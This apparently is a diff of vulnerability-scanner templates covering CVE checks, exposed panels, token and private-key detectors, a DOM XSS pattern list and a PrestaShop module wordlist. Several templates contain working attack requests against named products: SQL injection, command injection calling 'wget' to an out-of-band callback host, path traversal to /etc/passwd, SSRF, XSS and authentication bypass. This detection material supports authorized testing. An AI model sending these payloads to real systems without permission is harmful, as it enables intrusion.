description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
tags: cve,cve2020,sqli,opensis
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
- https://cinzinga.com/CVE-2020-6637/
requests:
- method: POST
path:
- '{{BaseURL}}/account/index.php'
- '{{BaseURL}}/opensis/index.php'
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded
body: |
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SQL STATEMENT:'
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
condition: and
- type: word
part: header
words:
- "text/html"
condition: and
- type: status
status:
- 200

25
cves/2020/CVE-2020-7796.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
reference: |
- https://www.adminxe.com/2183.html
tags: cve,cve2020,zimbra,ssrf,oob
requests:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

4
cves/2021/CVE-2021-21389.yaml
View File

@ -7,7 +7,9 @@ info:
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference: |
- https://github.com/HoangKien1020/CVE-2021-21389
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
tags: cve,cve2021,wordpress,wp-plugin,rce

28
cves/2021/CVE-2021-21816.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-21816
info:
name: D-LINK DIR-3040 - Syslog Information Disclosure
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
author: gy741
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
requests:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
part: body
condition: and
- type: status
status:
- 200

31
cves/2021/CVE-2021-24235.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2021-24235
info:
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
matchers-condition: and
matchers:
- type: word
words:
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
cves/2021/CVE-2021-24320.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
reference: |
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:

38
cves/2021/CVE-2021-27561.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27561
info:
name: YeaLink DM PreAuth RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Unauthenticated Remote Code Execution
tags: cve,cve2021,rce,yealink
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
requests:
- method: GET
path:
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- 'uid'
- 'gid'
- 'groups'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

1
cves/2021/CVE-2021-28151.yaml
View File

@ -64,5 +64,6 @@ requests:
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and

1
cves/2021/CVE-2021-29203.yaml
View File

@ -4,6 +4,7 @@ info:
author: madrobot
severity: critical
tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference: |
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203

32
cves/2021/CVE-2021-29484.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-29484
info:
name: DOM XSS in Ghost CMS
author: rootxharsh,iamnoooob
description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
severity: medium
tags: cve,cve2021,xss,ghost
reference: |
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests:
- method: GET
path:
- "{{BaseURL}}/ghost/preview"
matchers-condition: and
matchers:
- type: word
words:
- 'XMLHttpRequest.prototype.open'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200

1
cves/2021/CVE-2021-30497.yaml
View File

@ -4,6 +4,7 @@ info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
tags: cve,cve2021,avalanche,traversal

5
cves/2021/CVE-2021-31581.yaml
View File

@ -25,3 +25,8 @@ requests:
- "name:"
- "pass:"
condition: and
- type: word
words:
- "html>"
negative: true

10
cves/2021/CVE-2021-3223.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-3223
info:
name: Node RED Dashboard - Directory Traversal
author: gy741
author: gy741,pikpikcu
severity: high
description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
reference: |
@ -14,8 +14,16 @@ requests:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "Node-RED web server is listening"

25
cves/2021/CVE-2021-32305.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2021-32305
info:
name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
author: gy741
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
tags: cve,cve2021,websvn,rce,oob
requests:
- raw:
- |
GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

34
cves/2021/CVE-2021-3297.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-3297
info:
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
author: gy741
severity: high
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
tags: cve,cve2021,zyxel,auth-bypass,router
requests:
- raw:
- |
GET /status.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
cookie: language=en; login=1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Running Time"
- "Firmware Version"
- "Firmware Build Time"
condition: and

24
cves/2021/CVE-2021-36380.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2021-36380
info:
name: Sunhillo SureLine - Unauthenticated OS Command Injection
description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
author: gy741
severity: critical
reference: |
- https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
tags: cve,cve2021,sureline,rce,oob
requests:
- raw:
- |
POST /cgi/networkDiag.cgi HTTP/1.1
Host: {{Hostname}}
command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

36
cves/2021/CVE-2021-37216.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-37216
info:
name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
author: dwisiswant0
description: |
QSAN Storage Manager header page parameters does not filter special characters.
Remote attackers can inject JavaScript without logging in and launch
reflected XSS attacks to access and modify specific data.
reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
severity: medium
tags: cve,cve2021,xss,qsan
requests:
- method: GET
path:
- "{{BaseURL}}/http_header.php"
headers:
X-Trigger-XSS: "<script>alert(1)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'
- type: word
part: header
words:
- "text/html"
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-xss-protection')"

39
cves/2021/CVE-2021–35336.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-202135336
info:
name: Unauthorised Remote Access of Internal Panel
author: Pratik Khalane
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference: |
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
requests:
- method: GET
path:
- '{{BaseURL}}/api/get_device_details'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: '{{BaseURL}}/assets/base/home.html'
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
matchers-condition: and
matchers:
- type: word
words:
- "<SERIAL>"
- "<VERSION>"
condition: and
- type: word
words:
- "text/xml"
part: header
- type: status
status:
- 200

2
default-logins/oracle/oracle-bi-default-credentials.yaml
View File

@ -4,7 +4,7 @@ info:
name: Oracle Business Intelligence Default Credentials
author: milo2012
severity: high
tags: oracle,dlogin
tags: oracle,default-login
requests:
- raw:

6
dns/nameserver-detection.yaml → dns/can-i-take-over-dns.yaml
View File

@ -1,10 +1,10 @@
id: nameserver-detection
id: can-i-take-over-dns
info:
name: NS Detection
name: Can I Take Over DNS - Fingerprint
author: pdteam
severity: info
tags: dns,ns
tags: dns,ns,takeover
reference: https://github.com/indianajson/can-i-take-over-dns
dns:

22
dns/dnssec-detection.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dnssec-detection
info:
name: DNSSEC Detection
description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
author: pdteam
severity: info
tags: dns,dnssec
reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
dns:
- name: "{{FQDN}}"
type: DS
class: inet
recursion: true
retries: 3
extractors:
- type: regex
group: 1
regex:
- "IN\tDS\t(.+)"

31
exposed-panels/camunda-login-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: camunda-login-panel
info:
name: Camunda Login panel
author: alifathi-h1
severity: info
description: Default Credentials of demo:demo on Camunda application.
reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
tags: camunda,panel
requests:
- method: GET
path:
- '{{BaseURL}}/app/welcome/default/#!/login'
- '{{BaseURL}}/camunda/app/welcome/default/#!/login'
matchers-condition: and
matchers:
- type: word
words:
- "Camunda Welcome"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<footer cam-widget-footer version="v([0-9.]+)"'

2
exposed-panels/cerebro-panel.yaml
View File

@ -2,7 +2,7 @@ id: cerebro-panel
info:
name: Cerebro Panel
author: elder tao
author: huowuzhao,elder tao
severity: high
reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro

2
exposed-panels/tikiwiki-cms.yaml
View File

@ -4,7 +4,7 @@ info:
name: Tiki Wiki CMS Groupware
author: chron0x
severity: info
tags: panel
tags: panel,tikiwiki
requests:
- method: GET

4
exposures/configs/appsec-yml-disclosure.yaml → exposures/configs/appspec-yml-disclosure.yaml
View File

@ -1,7 +1,7 @@
id: appsec-yml-disclosure
id: appspec-yml-disclosure
info:
name: Appsec Yml Disclosure
name: Appspec Yml Disclosure
author: dhiyaneshDk
severity: medium
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json

15
exposures/configs/git-config.yaml
View File

@ -8,16 +8,9 @@ info:
tags: config,git,exposure
requests:
- raw:
- |
GET /.git/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
Connection: close
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers-condition: and
matchers:
@ -33,4 +26,4 @@ requests:
- type: status
status:
- 200
- 200

32
exposures/files/github-gemfile-files.yaml Normal file
View File

@ -0,0 +1,32 @@
id: github-gemfile-files
info:
name: Github Gemfiles
author: hahwul
severity: info
description: Find github page files(Gemfile / Gemfile.lock)
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/Gemfile"
- "{{BaseURL}}/Gemfile.lock"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "source")'
- 'contains(body, "gem")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "remote")'
- 'contains(body, "specs")'
- 'status_code == 200'
condition: and

26
exposures/files/github-page-config.yaml Normal file
View File

@ -0,0 +1,26 @@
id: github-page-config
info:
name: Github pages config file
author: hahwul
severity: info
description: Find github pages config file.
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/_config.yml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "jekyll"
- "title"
- "baseurl"
condition: and

1375
exposures/tokens/generic/credentials-disclosure.yaml
View File

File diff suppressed because it is too large Load Diff

3
exposures/tokens/generic/general-tokens.yaml
View File

@ -26,7 +26,8 @@ requests:
part: body
regex:
- '(?i)key(up|down|press|boardnavigation)'
- '(?i)password(emailnotfoundmessage|label|errormessage|message)'
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message)'
- '(?i)keys_(close|previous|next|zoom|play_pause)'
condition: or
negative: true

6
file/keys/private-key.yaml
View File

@ -2,7 +2,7 @@ id: private-key
info:
name: Private Key Detect
author: gaurang
author: gaurang,geeknik
severity: high
tags: token,file
@ -19,4 +19,6 @@ file:
- "\"BEGIN DSA PRIVATE KEY\""
- "\"BEGIN EC PRIVATE KEY\""
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
- "\"ssh-rsa\""
- "\"ssh-rsa\""
- "\"ssh-dsa\""
- "\"ssh-ed25519\""

2
file/keys/slack-webhook.yaml
View File

@ -13,4 +13,4 @@ file:
extractors:
- type: regex
regex:
- "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{10}/B[0-9A-Za-z\\-_]{10}/[0-9A-Za-z\\-_]{23}"
- "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}"

4
file/keys/square-access-token.yaml
View File

@ -1,7 +1,7 @@
id: square-access-token
info:
name: Square Accesss Token
name: Square Access Token
author: gaurang
severity: high
tags: token,file
@ -13,4 +13,4 @@ file:
extractors:
- type: regex
regex:
- "sq0atp-[0-9A-Za-z\\-_]{22}"
- "sq0atp-[0-9A-Za-z\\-_]{22}"

46
file/xss/dom-xss.yaml Normal file
View File

@ -0,0 +1,46 @@
id: dom-xss
info:
name: DOM XSS Sources & Sinks
reference: Inspired by https://portswigger.net/blog/introducing-dom-invader
# The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report.
author: geeknik
severity: info
tags: xss,file
file:
- extensions:
- js
- ts
- html
- php
- cs
- rb
- py
extractors:
- type: regex
name: sink
part: body
regex:
- 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)'
- 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse'
- 'fetch(\.body)?'
- 'history(\.pushState|\.replaceState)'
- '(session|local)Storage(\.setItem(\.name|\.value))'
- 'anchor(\.href|\.target)'
- 'button(\.formaction|\.value)'
- 'set(Timeout|Interval|Immediate)'
- 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)'
- 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)'
- 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))'
- 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?'
- 'iframe(\.srcdoc|\.src)'
- 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)'
- type: regex
name: source
part: body
regex:
- 'location(\.href|\.hash|\.search|\.pathname)?'
- 'window\.name'
- 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)'

44
fuzzing/prestashop-module-fuzz.yaml Normal file
View File

@ -0,0 +1,44 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
severity: info
tags: fuzz,prestashop
requests:
- payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
raw:
- |
GET /modules/{{path}}/config.xml HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: word
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 2
regex:
- '<version>(<!\[CDATA\[)?([0-9.]+)'

639
helpers/wordlists/prestashop-modules.txt Normal file
View File

@ -0,0 +1,639 @@
1attributewizardpro
AddGoogleStructuredData
AddGoogleTagManager
Back-to-Top-Module-Prestashop-1.7
CBAMP
ChangeOrderIndex
EuCookieSmart
NetLicensing-PrestaShop
PS-Get-Free-Shipping
PS-Sendy
PayPal
PrestaShop-Module-Image-Rollover
PrestaShop-module-Pays
PrestaShop3D
PrestaShop_1.6.0.9_Ukraine
Prestashop-BBL-Bankwire
Prestashop-ProductsScripsAndCss
Prestashop-SCB-Bankwire
Rasa-Integration-Project
Rave-Payment-Gateway-for-Prestashop-1.7
SMSIR-Prestashop
Security-Lite
SimpleCatalog
TurkPos-Sanal-Pos-Uygulamasi-Prestashop-Modulu
a2hosting
a_crisp
activecampaign
adminlistproduct
adpmicrodatos
adscale
adv_customer
advancedeucompliance
advancedexport
advancedslider
algolia
alipay
also
amazzingfilter
amzpayments
angarbanners
angarcmsinfo
angarfacebook
artisan-doc
attributewizardpro
attributewizardpro.OLD
attributewizardpro_x
attributwizardpro
authorizeaim
autoindex
autoupgrade
azleasyssl
ba_prestashop_invoice
backwardcompatibility
bamegamenu
bankwire
becommerce
blackholebots
blockadvertising
blockbanner
blockbestsellers
blockcart
blockcategories
blockcms
blockcmsinfo
blockcontact
blockcontactinfos
blockcounterz
blockcurrencies
blockcustomergroup
blockcustomerprivacy
blockfacebook
blocklanguages
blocklayered
blocklink
blockmanufacturer
blockmyaccount
blockmyaccountfooter
blocknewproducts
blocknewsletter
blockpaymentlogo
blockpermanentlinks
blockreassurance
blockreinsurance
blockrss
blocksearch
blocksharefb
blocksocial
blockspecials
blockstore
blocksupplier
blocktags
blocktopmenu
blockuserinfo
blockviewed
blockwishlist
bluesnap
bnclearcarts
bonmarkup
boxdropshipment
boxtal-connect-prestashop
bpostshm
brainweboptionaldni
brinkscheckout
bvkpaymentfees
carriercompare
cartabandonmentpro
cartabandonmentproOld
cashondelivery
checkyourdata
cheque
chronopost
cleancarroussel
cleverppc
clickline
clientlogin
cloudswipe-prestashop
codwfeeplus
columnadverts
columnadverts2
compta-vente
connect2pay-prestashop-module
contactform
convermax
countdowntimerbar
cronjobs
crossselling
customerfield
customers
cy_multibankwire
dashactivity
dashgoals
dashproducts
dashtrends
dateofdelivery
deactivateproducts
demo-cqrs-hooks-usage-module
demonstration
desjardins
doctrine
dotpay
dpdfrance
dpdgroup
dpdpoland
easymarketing
ebay
ecopresto
editorderpro
editorial
emailgenerator
emarketing
envoimoinscher
erpillicopresta
esat-prestashop
etdoptimizer
etranslation
eurovatgenerator
everblock
everpsblog
everpsclickandcollect
everpscss
everpscustomerconnect
everpsorderoptions
everpspopup
example-modules
example_module_mailtheme
expresscache
expressmailing
faceshop
famebit
fasardixml
favicon_notification
favoriteproducts
fbsample-addcolumninprodlist
fbsample-advconfig
fbsample-bocontroller
fbsample-bologactivity
fbsample-botraining
fbsample-callbundle
fbsample-console
fbsample-extracustomerfield
fbsample-jsaddvariable
fbsample-order
fbsample-orderconditions
fbsample_legacyvsmodern
fbsample_messageoftheday
fedexcarrier
feedaty
feeder
fianetfraud
fianetsceau
fieldbannerslider
fieldbestsellers
fieldblockcategories
fieldblocksearch
fieldblockwishlist
fieldblogcategories
fieldblogpopularposts
fieldblogrecentposts
fieldblogsearch
fieldblogtags
fieldbrandslider
fieldcompare
fieldcustomaddtabs
fieldhtmlblock
fieldmegamenu
fieldonecateproductslider
fieldpopupnewsletter
fieldproductcates
fieldproductcomments
fieldsizechart
fieldslideshow
fieldspecialproduct
fieldspecialproductdeal
fieldstaticblocks
fieldstaticfooter
fieldtabcateslider
fieldtabproductsisotope
fieldtestimonials
fieldthemecustomizer
fieldvmegamenu
firebaseauthenticator
firstdata
followup
followup/mails/pt
fontmanager
fop_console
fop_customcss
frenet_prestashop
gadwords
gamification
gamifications
ganalytics
gapi
gapps
gateway-prestashop-module
globkurier
gmseofields
gointerpay
googletag
graphartichow
graphgooglechart
graphnvd3
graphvisifire
graphxmlswfcharts
gridhtml
gshoppingfeed
gsitemap
gwadvancedinvoice
hipay
hipaymobileivr
holidaysmode
homecategoriez
homefeatured
homepageadvertise
homepageadvertise2
homeslider
idx_config
ifthenpay_mbway
importerosc
iqitadditionaltabs
iqitaddthisplugin
iqitcompare
iqitcontactpage
iqitcookielaw
iqitcountdown
iqitcrossselling
iqitdashboardnews
iqitelementor
iqitemailsubscriptionconf
iqitextendedproduct
iqitfreedeliverycount
iqithtmlandbanners
iqitlinksmanager
iqitmegamenu
iqitpopup
iqitproductsnav
iqitproducttags
iqitsearch
iqitsizecharts
iqitsociallogin
iqitthemeeditor
iqitwishlist
jbx_menu
jk_opengraph
jph_mymodule
jro_homepageadvertise
jsonws
jxcompareproduct
jxwishlist
kbmarketplace
kiala
kialasmall
klikandpay
komfortkasse-prestashop
kuantokusta
labodata-prestashop
layerslider
lendingclub
lgcomments
lgfreeshippingzones
lgseoredirect
liveperson
loyalty
loyaltylion
mailalerts
mailjet
masseditproduct
mautic-prestashop
mcps_popup
mediafinanz
mercadopagobr
merchantware
migrationpro
mobfirst
modules
moloni
mondialrelay
monetivo-prestashop
ms_category_color
ms_products_override
multibanco
my_first_module_for_presta
myhreflang
netreviews
newsletter
newsletterpopupli
nimblepayment
nosto-prestashop
nostotagging
nqgatewayneteven
nvn_export_orders
odexportproducts
ogone
olark
onboarding
oneandonehosting
only18plus
openfactura-prestashop
openpayprestashop
orderfees_shipping
orderfiles
oscmigrationpro
ovhhosting
packlinkpro
pagesnotfound
pagseguro
paymentexample
paypal
paypalmx
paypalusa
payplug
paysera
payulatam
peinau-plugin-prestashop
pgc-prestashop
ph_blog_column_custom
ph_relatedposts
ph_simpleblog
phfbchat
phpist_github
phpistcustomerregistrationblocker
pigmbhpaymill
pixelcrush-prestashop
pixelfeed
pk_flexmenu
pk_vertflexmenu
plugin-prestashop-1.6.x
plugin-prestashop-1.7.x
posbestsellers
poscountdown
posfeaturedproducts
posfeatureproduct
posfraction
poslistcategories
poslistcategory
poslistcategoryproducts
poslogo
posmegamenu
posmodeproduct
posnewproducts
posproductcates
posrotatorimg
posscroll
possearchcategories
posslideshow
posslideshows
posspecialproduct
posspecialproducts
posspecialsproducts
posstaticblocks
posstaticfooter
postabcateslider
postabproduct
postabproductslider
postcodenl
postestimonials
posthemeoptions
posvegamenu
powatag
ppb
prestacollege
prestafraud
prestahop-module
prestaliexpress
prestapay
prestapopup
prestasex
prestashippingeasy
prestashop
prestashop-1.6
prestashop-1.6.1.6
prestashop-1.7
prestashop-auto-exploit
prestashop-clean-urls
prestashop-dashcalendar
prestashop-datalayer-tracking
prestashop-dotfiles
prestashop-ee
prestashop-exportorders
prestashop-homeyoutube
prestashop-intergration
prestashop-localeswitcher
prestashop-module
prestashop-multishopselector
prestashop-payment-integration-novalnet
prestashop-paymentrestrictionsip
prestashop-payrexx-gateway
prestashop-plugin
prestashop-pod-payment
prestashop-pod-sso
prestashop-seo-tk
prestashop-shopping-cart-message
prestashop-souin
prestashop-trovaprezzi
prestashop-youtube-module
prestashop17
prestasms
prestastats
pricealert
pricerounding
produck-prestashop-module
productcomments
productcover
productfinder16
productpageadverts
productpaymentlogos
productscategory
productsticker
producttooltip
protectedshops
przelewy24
ps-training
ps-yme
ps_WhatsappButton
ps_accounts
ps_advertising
ps_banner
ps_bestsellers
ps_brandlist
ps_buybuttonlite
ps_carriercomparison
ps_cashondelivery
ps_categoryproducts
ps_categorytree
ps_checkout
ps_checkpayment
ps_contactinfo
ps_crossselling
ps_currencyselector
ps_customeraccountlinks
ps_customersignin
ps_customtext
ps_dataprivacy
ps_emailalerts
ps_emailgenerator
ps_emailsmanager
ps_emailsubscription
ps_eventbus
ps_facebook
ps_facetedsearch
ps_faviconnotificationbo
ps_featuredproducts
ps_feeder
ps_googleanalytics
ps_imageslider
ps_languageselector
ps_legalcompliance
ps_linklist
ps_livetranslation
ps_mainmenu
ps_mbo
ps_metrics
ps_native
ps_newproducts
